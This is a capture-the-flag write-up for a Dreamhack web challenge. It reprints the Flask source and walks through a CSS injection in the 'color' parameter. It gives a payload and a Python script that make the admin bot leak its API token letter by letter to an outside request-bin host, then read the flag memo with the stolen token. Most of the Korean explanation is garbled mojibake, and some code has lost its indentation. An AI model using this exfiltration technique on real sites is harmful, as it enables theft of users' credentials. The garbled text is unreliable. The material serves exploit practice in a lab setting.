1. 문제
https://dreamhack.io/wargame/challenges/421
2. 해결 과정
(1) 코드 분석
전체 코드
#!/usr/bin/python3
import hashlib, os, binascii, random, string
from flask import Flask, request, render_template, redirect, url_for, session, g, flash
from functools import wraps
import sqlite3
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from promise import Promise
# Flask application object; every route below is registered on it.
app = Flask(__name__)
# The session-signing key is random per process start, so it is never the same
# across restarts.
app.secret_key = os.urandom(32)
# SQLite file path; overridable through the DATABASE environment variable.
DATABASE = os.environ.get("DATABASE", "database.db")
# Load the challenge flag. Fall back to a placeholder when flag.txt is missing
# or unreadable so the application still starts (e.g. local development).
try:
    # `with` closes the file handle even if read() fails.
    with open("./flag.txt", "r") as flag_file:
        FLAG = flag_file.read().strip()
except (OSError, UnicodeError):
    # Only I/O and decoding problems are expected here; anything else
    # (KeyboardInterrupt, programming errors) should not be swallowed.
    FLAG = "[**FLAG**]"

# Admin credentials: fixed username and a random password generated at import
# time. ADMIN_PASSWORD is a bytes object holding 64 hex characters.
ADMIN_USERNAME = "administrator"
ADMIN_PASSWORD = binascii.hexlify(os.urandom(32))
def execute(query, data=()):
    """Run one SQL statement against DATABASE and return every result row.

    A new connection is opened per call. The statement is committed before
    the rows are fetched, so the helper serves both reads and writes.

    Args:
        query: SQL text; may contain positional or named placeholders.
        data: Sequence or mapping of values bound to the placeholders.

    Returns:
        A list of row tuples (empty for statements that yield no rows).

    Raises:
        sqlite3.Error: Propagated from the driver. The connection is closed
            before the exception leaves this function.
    """
    con = sqlite3.connect(DATABASE)
    try:
        cur = con.cursor()
        cur.execute(query, data)
        con.commit()
        return cur.fetchall()
    finally:
        # Close on every path; previously a failing statement leaked the
        # connection.
        con.close()
def token_generate(length=8):
    """Return an API token that is not yet present in the users table.

    The token consists of lowercase ASCII letters. Candidates are drawn until
    one is found that no existing user row carries.

    Args:
        length: Number of characters in the token (default 8, the original
            fixed length).

    Returns:
        The new token string.
    """
    # Local import keeps this block self-contained. API tokens are
    # credentials, so they come from the OS CSPRNG rather than the
    # predictable `random` module.
    import secrets

    while True:
        token = "".join(
            secrets.choice(string.ascii_lowercase) for _ in range(length)
        )
        token_exists = execute(
            "SELECT * FROM users WHERE token = :token;", {"token": token}
        )
        if not token_exists:
            return token
def login_required(view):
    """Decorator that only lets requests with a logged-in session reach ``view``.

    Requests without a truthy ``uid`` in the session get a flash message and
    are redirected to the login page.
    """

    @wraps(view)
    def wrapped_view(*args, **kwargs):
        # flash() stores its messages in the session too, so a non-empty
        # session does not guarantee that "uid" exists. .get() avoids the
        # KeyError the original `session["uid"]` lookup raised in that case.
        if session.get("uid"):
            return view(*args, **kwargs)
        flash("login first !")
        return redirect(url_for("login"))

    return wrapped_view
def apikey_required(view):
    """Decorator that authenticates a request through its ``API-KEY`` header.

    The header value is looked up in ``users.token``. On a match the owning
    user's uid (first column of the row) is attached as ``request.uid`` and
    the view runs; otherwise a JSON body with code 401 is returned.
    """

    @wraps(view)
    def wrapped_view(**kwargs):
        matches = execute(
            "SELECT * FROM users WHERE token = :token;",
            {"token": request.headers.get("API-KEY", None)},
        )
        if not matches:
            return {"code": 401, "message": "Access Denined !"}
        request.uid = matches[0][0]
        return view(**kwargs)

    return wrapped_view
@app.teardown_appcontext
def close_connection(exception):
    """Close the connection stored on ``g._database``, if there is one."""
    connection = getattr(g, "_database", None)
    if connection is None:
        return
    connection.close()
@app.context_processor
def background_color():
    """Expose the ``color`` query parameter (default "white") to templates."""
    # NOTE(review): the value is taken from the query string without any
    # validation. The accompanying write-up reports that it is used as the
    # page's background colour and that this allows CSS injection.
    return {"color": request.args.get("color", "white")}
@app.route("/")
def index():
    """Serve the landing page."""
    page = render_template("index.html")
    return page
@app.route("/login", methods=["GET", "POST"])
def login():
    """Show the login form (GET) or authenticate the submitted credentials (POST).

    On success the user's uid and username are stored in the session and the
    client is redirected to the index page. On failure a flash message is set
    and the client is redirected back to the login form.
    """
    if request.method == "GET":
        return render_template("login.html")

    username = request.form.get("username")
    password = request.form.get("password")
    # A request without the form fields used to crash on `None.encode()`;
    # treat it like any other failed login instead.
    if username is not None and password is not None:
        user = execute(
            "SELECT * FROM users WHERE username = :username and password = :password;",
            {
                "username": username,
                "password": hashlib.sha256(password.encode()).hexdigest(),
            },
        )
        if user:
            session["uid"] = user[0][0]
            session["username"] = user[0][1]
            return redirect(url_for("index"))
    flash("Wrong username or password !")
    return redirect(url_for("login"))
@app.route("/logout")
@login_required
def logout():
    """Drop all session data and send the user back to the index page."""
    session.clear()
    flash("Logout !")
    destination = url_for("index")
    return redirect(destination)
@app.route("/register", methods=["GET", "POST"])
def register():
    """Show the sign-up form (GET) or create a new account (POST).

    A new account gets the SHA-256 hex digest of its password and a freshly
    generated API token. Duplicate usernames are rejected with a flash
    message.
    """
    if request.method == "GET":
        return render_template("register.html")

    username = request.form.get("username")
    password = request.form.get("password")
    # Missing form fields used to end in an unhandled exception
    # (None.encode() / NOT NULL violation); reject them explicitly.
    if username is None or password is None:
        flash("Username and password are required !")
        return redirect(url_for("register"))

    user = execute(
        "SELECT * FROM users WHERE username = :username;", {"username": username}
    )
    if user:
        flash("Username already exists !")
        return redirect(url_for("register"))

    token = token_generate()
    sql = "INSERT INTO users(username, password, token) VALUES (:username, :password, :token);"
    try:
        execute(
            sql,
            {
                "username": username,
                "password": hashlib.sha256(password.encode()).hexdigest(),
                "token": token,
            },
        )
    except sqlite3.IntegrityError:
        # Another request registered the same name between the check above
        # and this insert; the UNIQUE constraint caught it.
        flash("Username already exists !")
        return redirect(url_for("register"))
    flash("Register Success.")
    return redirect(url_for("login"))
@app.route("/mypage")
@login_required
def mypage():
    """Render the profile page for the logged-in user's database row."""
    rows = execute(
        "SELECT * FROM users WHERE uid = :uid;", {"uid": session["uid"]}
    )
    current_user = rows[0]
    return render_template("mypage.html", user=current_user)
@app.route("/memo", methods=["GET", "POST"])
@login_required
def memopage():
    """List the logged-in user's memos (GET) or store a new one (POST)."""
    if request.method == "GET":
        memos = execute(
            "SELECT * FROM memo WHERE uid = :uid;", {"uid": session["uid"]}
        )
        return render_template("memo.html", memos=memos)

    memo = request.form.get("memo")
    # memo.text is NOT NULL: a POST without the field used to raise an
    # IntegrityError. Skip the insert and simply show the list again.
    if memo is not None:
        sql = "INSERT INTO memo(uid, text) VALUES(:uid, :text);"
        execute(sql, {"uid": session["uid"], "text": memo})
    return redirect(url_for("memopage"))
# report
@app.route("/report", methods=["GET", "POST"])
def report():
    """Show the report form, or have the admin bot visit a submitted path.

    On POST the ``path`` form field (one leading "/" removed) is appended to
    ``http://127.0.0.1:8000/`` and passed to ``check_url``. The outcome is
    reported through a flash message.
    """
    # Flask also routes HEAD requests to GET views. Handling "anything that is
    # not POST" here keeps such a request from falling through every branch
    # and returning None, which Flask rejects as an invalid response.
    if request.method != "POST":
        return render_template("report.html")

    path = request.form.get("path")
    if not path:
        flash("fail.")
        return redirect(url_for("report"))
    if path.startswith("/"):
        path = path[1:]
    url = f"http://127.0.0.1:8000/{path}"
    flash("success." if check_url(url) else "fail.")
    return redirect(url_for("report"))
def check_url(url):
    """Log in as the administrator in headless Chrome, then visit ``url``.

    Args:
        url: Address the logged-in browser should open.

    Returns:
        True when every browser step completed, False when any step raised.
    """
    # Bound before the try block so the cleanup below is safe even when the
    # browser never started. The original referenced an unbound name then.
    driver = None
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for argument in (
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ):
            options.add_argument(argument)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)

        # The original wrapped these calls in Promise(...)/.then(...), but each
        # argument was evaluated eagerly before being passed, so the steps
        # already ran one after another. They are written sequentially here.
        driver.get("http://127.0.0.1:8000/login")
        driver.find_element(By.NAME, "username").send_keys(str(ADMIN_USERNAME))
        driver.find_element(By.NAME, "password").send_keys(ADMIN_PASSWORD.decode())
        driver.find_element(By.ID, "submit").click()
        driver.get(url)
    except Exception:
        # Best effort: any browser failure is reported to the caller as False.
        return False
    finally:
        # Single cleanup point; runs on success and on failure.
        if driver is not None:
            driver.quit()
    return True
# API
@app.route("/api/me")
@apikey_required
def APIme():
    """Return uid and username of the account that owns the supplied API key."""
    rows = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": request.uid})
    if not rows:
        return {"code": 500, "message": "Error !"}
    account = rows[0]
    return {"code": 200, "uid": account[0], "username": account[1]}
@app.route("/api/memo")
@apikey_required
def APImemo():
    """Return every memo of the account that owns the supplied API key.

    Responds with code 500 when the account has no memos.
    """
    rows = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": request.uid})
    if not rows:
        return {"code": 500, "message": "Error !"}
    # Row layout follows the memo table: (idx, uid, text).
    entries = [{"idx": row[0], "memo": row[2]} for row in rows]
    return {"code": 200, "memo": entries}
# For Challenge
def init():
    """Rebuild the schema and seed the admin account and the flag memo.

    Drops and recreates the ``users`` and ``memo`` tables, inserts the
    administrator with a SHA-256 hashed password and a fresh API token, then
    stores the flag as a memo owned by that account.
    """
    users_ddl = (
        "\n"
        "CREATE TABLE users (\n"
        "uid INTEGER PRIMARY KEY,\n"
        "username TEXT NOT NULL UNIQUE,\n"
        "password TEXT NOT NULL,\n"
        "token TEXT NOT NULL UNIQUE\n"
        ");\n"
    )
    memo_ddl = (
        "\n"
        "CREATE TABLE memo (\n"
        "idx INTEGER PRIMARY KEY,\n"
        "uid INTEGER NOT NULL,\n"
        "text TEXT NOT NULL\n"
        ");\n"
    )
    # Same order as before: drop + create users, then drop + create memo.
    for table, ddl in (("users", users_ddl), ("memo", memo_ddl)):
        execute(f"DROP TABLE IF EXISTS {table};")
        execute(ddl)

    # Administrator account.
    admin_account = {
        "username": ADMIN_USERNAME,
        "password": hashlib.sha256(ADMIN_PASSWORD).hexdigest(),
        "token": token_generate(),
    }
    execute(
        "INSERT INTO users (username, password, token)VALUES (:username, :password, :token);",
        admin_account,
    )

    # The flag lives in a memo that belongs to the administrator's uid.
    admin_rows = execute(
        "SELECT * FROM users WHERE username = :username;",
        {"username": ADMIN_USERNAME},
    )
    flag_memo = {"uid": admin_rows[0][0], "text": "FLAG is " + FLAG}
    execute("INSERT INTO memo (uid, text)VALUES (:uid, :text);", flag_memo)
# Runs at import time: the database is reset and reseeded (schema, admin
# account, flag memo) whenever this module is loaded.
with app.app_context():
init()
# Script entry point: serve on all interfaces, port 8000.
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8000)
(init) 서버가 시작되면서, admin 계정이 생성되고 admin 계정의 메모가 생성된다.
이때 메모에 플래그가 저장된다. 즉, 플래그는 admin 계정의 메모에 존재한다.
# Add admin: insert the administrator account with the SHA-256 hex digest of
# its random password and a freshly generated API token.
execute(
"INSERT INTO users (username, password, token)"
"VALUES (:username, :password, :token);",
{
"username": ADMIN_USERNAME,
"password": hashlib.sha256(ADMIN_PASSWORD).hexdigest(),
"token": token_generate(),
},
)
# Fetch the admin row back; its first column (uid) is used as the memo owner.
adminUid = execute(
"SELECT * FROM users WHERE username = :username;", {"username": ADMIN_USERNAME}
)
# Add FLAG: store the flag as a memo owned by the administrator.
execute(
"INSERT INTO memo (uid, text)" "VALUES (:uid, :text);",
{"uid": adminUid[0][0], "text": "FLAG is " + FLAG},
)
ํ์๊ฐ์ ์ ํ๋ฉด, username, password, token์ sql์ ์ฝ์ ํ๋ค.
@app.route("/register", methods=["GET", "POST"])
def register():
    """Show the sign-up form (GET) or create a new account (POST).

    A new account gets the SHA-256 hex digest of its password and a freshly
    generated API token. Duplicate usernames are rejected with a flash
    message.
    """
    if request.method == "GET":
        return render_template("register.html")

    username = request.form.get("username")
    password = request.form.get("password")
    # Missing form fields used to end in an unhandled exception
    # (None.encode() / NOT NULL violation); reject them explicitly.
    if username is None or password is None:
        flash("Username and password are required !")
        return redirect(url_for("register"))

    user = execute(
        "SELECT * FROM users WHERE username = :username;", {"username": username}
    )
    if user:
        flash("Username already exists !")
        return redirect(url_for("register"))

    token = token_generate()
    sql = "INSERT INTO users(username, password, token) VALUES (:username, :password, :token);"
    try:
        execute(
            sql,
            {
                "username": username,
                "password": hashlib.sha256(password.encode()).hexdigest(),
                "token": token,
            },
        )
    except sqlite3.IntegrityError:
        # Another request registered the same name between the check above
        # and this insert; the UNIQUE constraint caught it.
        flash("Username already exists !")
        return redirect(url_for("register"))
    flash("Register Success.")
    return redirect(url_for("login"))
ํ ํฐ์ 8์๋ฆฌ ์๋ฌธ์๋ก ๊ตฌ์ฑ๋๋ค.
def token_generate(length=8):
    """Return an API token that is not yet present in the users table.

    The token consists of lowercase ASCII letters. Candidates are drawn until
    one is found that no existing user row carries.

    Args:
        length: Number of characters in the token (default 8, the original
            fixed length).

    Returns:
        The new token string.
    """
    # Local import keeps this block self-contained. API tokens are
    # credentials, so they come from the OS CSPRNG rather than the
    # predictable `random` module.
    import secrets

    while True:
        token = "".join(
            secrets.choice(string.ascii_lowercase) for _ in range(length)
        )
        token_exists = execute(
            "SELECT * FROM users WHERE token = :token;", {"token": token}
        )
        if not token_exists:
            return token
mypage์์ ํ ํฐ๊ฐ์ ํ์ธํ ์ ์๋ค.
@app.route("/mypage")
@login_required
def mypage():
    """Render the profile page for the logged-in user's database row."""
    rows = execute(
        "SELECT * FROM users WHERE uid = :uid;", {"uid": session["uid"]}
    )
    current_user = rows[0]
    return render_template("mypage.html", user=current_user)
/report ํ์ด์ง์์ path๋ฅผ ์ ๋ ฅ๋ฐ์ check_url()์ ๋๊ธด๋ค.
# report
@app.route("/report", methods=["GET", "POST"])
def report():
    """Show the report form, or have the admin bot visit a submitted path.

    On POST the ``path`` form field (one leading "/" removed) is appended to
    ``http://127.0.0.1:8000/`` and passed to ``check_url``. The outcome is
    reported through a flash message.
    """
    # Flask also routes HEAD requests to GET views. Handling "anything that is
    # not POST" here keeps such a request from falling through every branch
    # and returning None, which Flask rejects as an invalid response.
    if request.method != "POST":
        return render_template("report.html")

    path = request.form.get("path")
    if not path:
        flash("fail.")
        return redirect(url_for("report"))
    if path.startswith("/"):
        path = path[1:]
    url = f"http://127.0.0.1:8000/{path}"
    flash("success." if check_url(url) else "fail.")
    return redirect(url_for("report"))
check_url์ admin ๊ณ์ ์ ๋ก๊ทธ์ธํ ๋ค ๊ฒฐ๊ณผ๊ฐ์ ๋ฆฌํดํด์ค๋ค.
- ๋ก์ปฌ์ ๋ก๊ทธ์ธ ํ์ด์ง ์ ์
- admin ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
- url ์ ์
์ฆ, /report ํ์ด์ง๋ admin ๊ณ์ ์ ๊ถํ์ผ๋ก ํ์ด์ง๋ฅผ ๋์๋ค๋ ์ ์๋๋ก ํด์ค๋ค.
def check_url(url):
    """Log in as the administrator in headless Chrome, then visit ``url``.

    Args:
        url: Address the logged-in browser should open.

    Returns:
        True when every browser step completed, False when any step raised.
    """
    # Bound before the try block so the cleanup below is safe even when the
    # browser never started. The original referenced an unbound name then.
    driver = None
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for argument in (
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ):
            options.add_argument(argument)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)

        # The original wrapped these calls in Promise(...)/.then(...), but each
        # argument was evaluated eagerly before being passed, so the steps
        # already ran one after another. They are written sequentially here.
        driver.get("http://127.0.0.1:8000/login")
        driver.find_element(By.NAME, "username").send_keys(str(ADMIN_USERNAME))
        driver.find_element(By.NAME, "password").send_keys(ADMIN_PASSWORD.decode())
        driver.find_element(By.ID, "submit").click()
        driver.get(url)
    except Exception:
        # Best effort: any browser failure is reported to the caller as False.
        return False
    finally:
        # Single cleanup point; runs on success and on failure.
        if driver is not None:
            driver.quit()
    return True
/api/me , /api/memo ์ ์ ์ํ๊ธฐ ์ํด์๋ @apikey_required ๋ถํฐ ํต๊ณผํด์ผ ํ๋ค.
uid์ ๊ฒฐ๊ณผ, ํด๋น ๊ฐ์ด user[0][0]์ผ ๋์๋ง 200 ์ฝ๋๋ฅผ ๋ฆฌํดํด์ค๋ค -> admin
์ฆ, admin์ธ ๊ฒ์ด ํ์ธ๋๋ฉด users ํ ์ด๋ธ์์ ์ ๋ณด๋ฅผ ์ถ๋ ฅํด์ฃผ๊ณ , memo ํ ์ด๋ธ์์ ๋ฉ๋ชจ๋ฅผ ์ถ๋ ฅํด์ค๋ค.
# API
@app.route("/api/me")
@apikey_required
def APIme():
    """Return uid and username of the account that owns the supplied API key."""
    rows = execute("SELECT * FROM users WHERE uid = :uid;", {"uid": request.uid})
    if not rows:
        return {"code": 500, "message": "Error !"}
    account = rows[0]
    return {"code": 200, "uid": account[0], "username": account[1]}
@app.route("/api/memo")
@apikey_required
def APImemo():
    """Return every memo of the account that owns the supplied API key.

    Responds with code 500 when the account has no memos.
    """
    rows = execute("SELECT * FROM memo WHERE uid = :uid;", {"uid": request.uid})
    if not rows:
        return {"code": 500, "message": "Error !"}
    # Row layout follows the memo table: (idx, uid, text).
    entries = [{"idx": row[0], "memo": row[2]} for row in rows]
    return {"code": 200, "memo": entries}
apikey๋ ํค๋์ ์๋ API-KEY๋ฅผ ๊ฐ์ ธ์ token(api key)๋ฅผ ํ์ธํ๊ณ ,
ํด๋น ๊ณ์ ์ด token[0][0], ์ฆ admin์ด๋ฉด ๊ฒฐ๊ณผ๋ฅผ ๋ฐํํด์ฃผ๊ณ , ์๋๋ผ๋ฉด 401 ์ฝ๋๋ฅผ ๋ฐํํ๋ค.
def apikey_required(view):
    """Decorator that authenticates a request through its ``API-KEY`` header.

    The header value is looked up in ``users.token``. On a match the owning
    user's uid (first column of the row) is attached as ``request.uid`` and
    the view runs; otherwise a JSON body with code 401 is returned.
    """

    @wraps(view)
    def wrapped_view(**kwargs):
        matches = execute(
            "SELECT * FROM users WHERE token = :token;",
            {"token": request.headers.get("API-KEY", None)},
        )
        if not matches:
            return {"code": 401, "message": "Access Denined !"}
        request.uid = matches[0][0]
        return view(**kwargs)

    return wrapped_view
์ฆ, ์ฐ๋ฆฌ๋ ํ๋๊ทธ๋ฅผ ์ฐพ๊ธฐ ์ํด admin ๊ณ์ ์ memo๋ฅผ ํ์ธํด์ผ ํ๋ค
(1) api/memo์์๋ API-KEY๋ง์ผ๋ก admin ๊ณ์ ์ ๋ฉ๋ชจ๋ฅผ ํ์ธํ ์ ์๋ค.
(2) ์ฐ๋ฆฌ๋ report๋ก admin ๊ณ์ ์ ์ ๊ทผํ ์ ์๋ค.
+) ๋ฌธ์ ์์ ๋๋๊ณ css injection์ด๋ผ๊ณ ๋ช ์ํ์ง๋ง, ํด๋น ๋ฌธ์ ๋ฅผ css injection์ผ๋ก ํ์ด์ผ ํ๋ ์ด์ ๋ฅผ ์ฐพ๊ณ ์ถ์๋ค.
์๊น ์ฝ๋ ๋ถ์๊ณผ์ ์์ ๋์ณค๋ ๋ถ๋ถ์ด ์๋๋ฐ ํ์ด์ง์ ๋ฐฐ๊ฒฝ color๊ฐ์ get ์์ฒญ์ ํตํด ๋ฐ๋๋ค.
์ฆ, ์์ฒญ์ ํตํด ๋ธ๋ผ์ฐ์ ์์ background ์ปฌ๋ฌ(CSS)๋ฅผ ๋ฐ๊ฟ ์ ์์ผ๋ฉฐ, ์ด ๋ถ๋ถ์ ์ด์ฉํด์ css injection์ด ๊ฐ๋ฅํ๋ค๋ ๊ฒ์ ์ ์์๋ค.
@app.context_processor
def background_color():
    """Expose the ``color`` query parameter (default "white") to templates."""
    # NOTE(review): the value is taken from the query string without any
    # validation. The accompanying write-up reports that it is used as the
    # page's background colour and that this allows CSS injection.
    return {"color": request.args.get("color", "white")}
์ฟผ๋ฆฌ์คํธ๋ง์ผ๋ก color=yellow๋ฅผ ์ฃผ๋, ๋ฐฐ๊ฒฝํ๋ฉด์ ์ปฌ๋ฌ๊ฐ ์ค์ ๋ก ๋ฐ๋๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
์ด์ด์, ํ ์คํธ๋ฅผ ์ํด mnzy/test๋ก ํ์๊ฐ์ ํ ๋ก๊ทธ์ธ์ ํ๋ค.
/mypage์๋ API Token์ด ๋ฐ๋ก ์ถ๋ ฅ๋๋ค.
๊ฐ๋ฐ์๋๊ตฌ๋ฅผ ํ์ธํด๋ณด๋ฉด api key๊ฐ text๋ก inputApitoken์ ๋ค์ด๊ฐ๋ ๊ฒ์ ํ์ธํ ์ ์๋ค.
์ด์ฒ๋ผ ์น ํ์ด์ง์ ์ง์ ์ ์ผ๋ก ๋ณด์ฌ์ง๋ ๊ฐ์ CSS ์ ํ์(Selector)๋ฅผ ํตํด ํํ์ด ๊ฐ๋ฅํ๋ค.
๊ณต๊ฒฉ์๊ฐ ์์ CSS ์์ฑ์ ์ฝ์ ํด ์นํ์ด์ง์ UI (์๊น์)๋ฅผ ๋ณ์กฐํ๊ฑฐ๋ CSS ์์ฑ์ ๋ค์ํ ๊ธฐ๋ฅ์ ํตํด ์น ํ์ด์ง๋ด์ ๋ฐ์ดํฐ๋ฅผ ์ธ๋ถ๋ก ํ์น ์ ์๋ค. ๋ฐ์ดํฐ์ ์๋ก๋ CSRF Token, ํผํด์์ API Key๋ฑ ์น ํ์ด์ง์ ์ง์ ์ ์ผ๋ก ๋ณด์ฌ์ง๋ ๊ฐ์ฒ๋ผ CSS ์ ํ์(Selector)๋ฅผ ํตํด ํํ์ด ๊ฐ๋ฅํด์ผ ํ๋ค.
정리해보자면
/mypage์์๋ token๊ฐ์ ๋ฐ๋ก ํ์ธํ ์ ์๋ค.
๋ฐ๋ผ์, /report ํ์ด์ง์์ css selector๋ฅผ ์ด์ฉํ์ฌ mypage์ ํ ํฐ๊ฐ์ ํ์ทจํด์ค๋ ์ฝ๋๋ฅผ ์์ฑํ๋ฉด ๋๋ค.
(2) 익스플로잇
ํ์ด๋ก๋๋ ์ฟผ๋ฆฌ๊ฐ์ผ๋ก mypage์ ์ ๊ทผํด์ ์ง์ ํ ์๋ฒ๋ก ping์ ๋ณด๋ด๋๋ก ํ ๊ฒ์ด๋ค.
ํน์๋ฌธ์ ๋ฑ์ ๋ํ ํํฐ๋ง์ด ์ ํ ์์ผ๋ฏ๋ก, ํ์๋ง ์ ์ ๊ฒฝ์จ์ ์์ฒญ์ ๋ณด๋ด๋ฉด ๋๋ค.
์ฐ๋ฆฌ๋ inputApitoken์ value ๊ฐ์ด ๊ฐ์ฅ ์ฒซ ๊ธ์๋ถํฐ ํ๋์ฉ ๊ฐ์ ธ์ฌ ๊ฒ์ด๋ค.
selector 2๊ฐ๋ฅผ ํตํด id์ value๊ฐ์ ์ง์ ํด์ฃผ๋๋ฐ, value์ ๊ฒฝ์ฐ ์๊ฒ ๋ ๋ฌธ์์ด + ์๋ ๋ฌธ์์ ํ์์ผ๋ก token์ ์์๋ด๋๋ก ํ ๊ฒ์ด๋ค. -> selector ํ์: [attr=value] / [attr^=value]
์ฐธ๊ณ : https://developer.mozilla.org/ko/docs/Web/CSS/Attribute_selectors
http://host3.dreamhack.games:21675/mypage?color=white;} input[id=InputApitoken][value^="+curr+token+"] {background: url(https://azcqvch.request.dreamhack.games/"+curr+token+");"}
따라서 아래와 같은 코드를 작성하였다.
ํ ๋ฒ์ ํ ํฐ ๊ฐ์ ์์๋ผ ์ ์๋ ์ฝ๋๋ฅผ ์์ฑํ๊ณ ์ถ์๋๋ฐ, ์คํจํด์ ํ ๊ธ์์ฉ ์์๋ด๋ ์ฝ๋๋ก ์์ฑํด์ ํ๋์ฉ ์์๋๋ค.
๊ธ์ ์์๋ด๋ฉด curr์ ์์์ ์ผ๋ก ์ถ๊ฐํด์ผ๋จ..ใ
import requests, string

# Report endpoint of the challenge instance; the admin bot visits whatever
# path is posted here.
URL = "http://host3.dreamhack.games:12465/report"

# Token prefix recovered so far. Extend it by hand after each run with the
# letter that showed up on the request bin.
curr = ""

# One report per candidate letter: the injected CSS rule matches only when the
# token input's value starts with the guessed prefix, and a matching rule makes
# the browser fetch the background image from the request bin.
for token in string.ascii_lowercase:
    guess = curr + token
    path = (
        "mypage?color=white;} "
        f"input[id=InputApitoken][value^={guess}] "
        f"{{background: url(https://azcqvch.request.dreamhack.games/{guess});"
    )
    data = {"path": path}
    response = requests.post(URL, data=data)
    print(f"'{token}': Status {response.status_code}")
admin์ ํ ํฐ๊ฐ์ ์์๋ด๋๋ฐ ์ฑ๊ณตํ๋ฉด, ์ด ํ ํฐ๊ฐ์ ์ด์ฉํด์ api/memo ์ ์ ๊ทผํ ๊ฒ์ด๋ค.
์ด ํ ํฐ๊ฐ์ ๊ฐ์ง๊ณ api/memo์ ์์ฒญ์ ๋ณด๋ด์ด ๋ด์ฉ์ ํ์ฑํด์ ํ๋๊ทธ๊ฐ์ ์ถ์ถํด๋ผ ์ ์๋ค.
import requests

URL = "http://host3.dreamhack.games:21675/api/memo"
TOKEN = "ykpnimfn"

# The API authenticates through the API-KEY header only.
headers = {"API-KEY": TOKEN}
response = requests.get(URL, headers=headers)

# Check the HTTP status first, then the application-level code in the body.
if response.status_code != 200:
    print(f"Failed to fetch data. Status code: {response.status_code}")
else:
    print("Request successful!")
    response_data = response.json()
    if response_data['code'] != 200:
        print(f"Error: {response_data['message']}")
    else:
        # Print every memo; the flag is stored in one of them.
        for memo in response_data['memo']:
            print(f"Memo index: {memo['idx']}, Memo content: {memo['memo']}")
성공